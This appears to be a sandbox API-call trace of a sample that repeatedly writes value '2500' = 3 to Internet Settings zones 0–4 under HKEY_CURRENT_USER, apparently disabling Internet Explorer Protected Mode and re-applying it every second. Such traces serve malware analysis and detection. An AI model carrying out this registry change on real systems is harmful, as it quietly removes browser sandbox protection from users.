	[0119.835] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0119.835] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.835] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.835] RegCloseKey (hKey=0x698) returned 0x0
	[0119.835] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0119.835] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.835] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.835] RegCloseKey (hKey=0x698) returned 0x0
	[0119.835] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0119.835] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.835] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.835] RegCloseKey (hKey=0x698) returned 0x0
	[0119.835] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0119.835] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.835] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.836] RegCloseKey (hKey=0x698) returned 0x0
	[0119.836] Sleep (dwMilliseconds=0x3e8) 
	[0119.838] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0119.838] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.838] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.838] RegCloseKey (hKey=0x698) returned 0x0
	[0119.838] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0119.838] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.838] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.838] RegCloseKey (hKey=0x698) returned 0x0
	[0119.838] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0119.838] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.838] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.838] RegCloseKey (hKey=0x698) returned 0x0
	[0119.838] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0119.838] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.838] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.839] RegCloseKey (hKey=0x698) returned 0x0
	[0119.839] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0119.839] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.839] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.839] RegCloseKey (hKey=0x698) returned 0x0
	[0119.839] Sleep (dwMilliseconds=0x3e8) 
	[0119.840] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0119.840] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.840] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.840] RegCloseKey (hKey=0x698) returned 0x0
	[0119.840] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0119.841] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.841] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.841] RegCloseKey (hKey=0x698) returned 0x0
	[0119.841] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0119.841] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.841] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.841] RegCloseKey (hKey=0x698) returned 0x0
	[0119.841] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0119.841] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.841] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.841] RegCloseKey (hKey=0x698) returned 0x0
	[0119.841] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0119.841] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.841] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.841] RegCloseKey (hKey=0x698) returned 0x0
	[0119.841] Sleep (dwMilliseconds=0x3e8) 
	[0119.843] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0119.843] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.843] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.843] RegCloseKey (hKey=0x698) returned 0x0
	[0119.844] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0119.844] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.844] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.844] RegCloseKey (hKey=0x698) returned 0x0
	[0119.844] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0119.844] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.844] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.844] RegCloseKey (hKey=0x698) returned 0x0
	[0119.844] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0119.844] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.844] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.844] RegCloseKey (hKey=0x698) returned 0x0
	[0119.844] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0119.844] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.844] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.844] RegCloseKey (hKey=0x698) returned 0x0
	[0119.844] Sleep (dwMilliseconds=0x3e8) 
	[0119.846] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0119.846] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.846] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.846] RegCloseKey (hKey=0x698) returned 0x0
	[0119.846] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0119.846] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.846] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.846] RegCloseKey (hKey=0x698) returned 0x0
	[0119.846] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0119.846] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.846] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.847] RegCloseKey (hKey=0x698) returned 0x0
	[0119.847] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0119.847] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.847] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.847] RegCloseKey (hKey=0x698) returned 0x0
	[0119.847] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0119.847] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.847] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.847] RegCloseKey (hKey=0x698) returned 0x0
	[0119.847] Sleep (dwMilliseconds=0x3e8) 
	[0119.848] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0119.848] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.848] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.848] RegCloseKey (hKey=0x698) returned 0x0
	[0119.848] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0119.849] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.849] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.849] RegCloseKey (hKey=0x698) returned 0x0
	[0119.849] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0119.849] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.849] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.849] RegCloseKey (hKey=0x698) returned 0x0
	[0119.849] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0119.849] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.849] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.849] RegCloseKey (hKey=0x698) returned 0x0
	[0119.849] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0119.849] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.849] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.849] RegCloseKey (hKey=0x698) returned 0x0
	[0119.849] Sleep (dwMilliseconds=0x3e8) 
	[0119.851] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0119.851] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.851] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.851] RegCloseKey (hKey=0x698) returned 0x0
	[0119.851] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0119.851] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.851] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.851] RegCloseKey (hKey=0x698) returned 0x0
	[0119.851] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0119.851] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.851] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.851] RegCloseKey (hKey=0x698) returned 0x0
	[0119.852] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0119.852] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.852] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.852] RegCloseKey (hKey=0x698) returned 0x0
	[0119.852] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0119.852] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.852] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.852] RegCloseKey (hKey=0x698) returned 0x0
	[0119.852] Sleep (dwMilliseconds=0x3e8) 
	[0119.855] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0119.855] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.856] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.856] RegCloseKey (hKey=0x698) returned 0x0
	[0119.856] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0119.856] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.856] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.856] RegCloseKey (hKey=0x698) returned 0x0
	[0119.856] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0119.856] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.856] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.856] RegCloseKey (hKey=0x698) returned 0x0
	[0119.856] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0119.856] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.856] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.856] RegCloseKey (hKey=0x698) returned 0x0
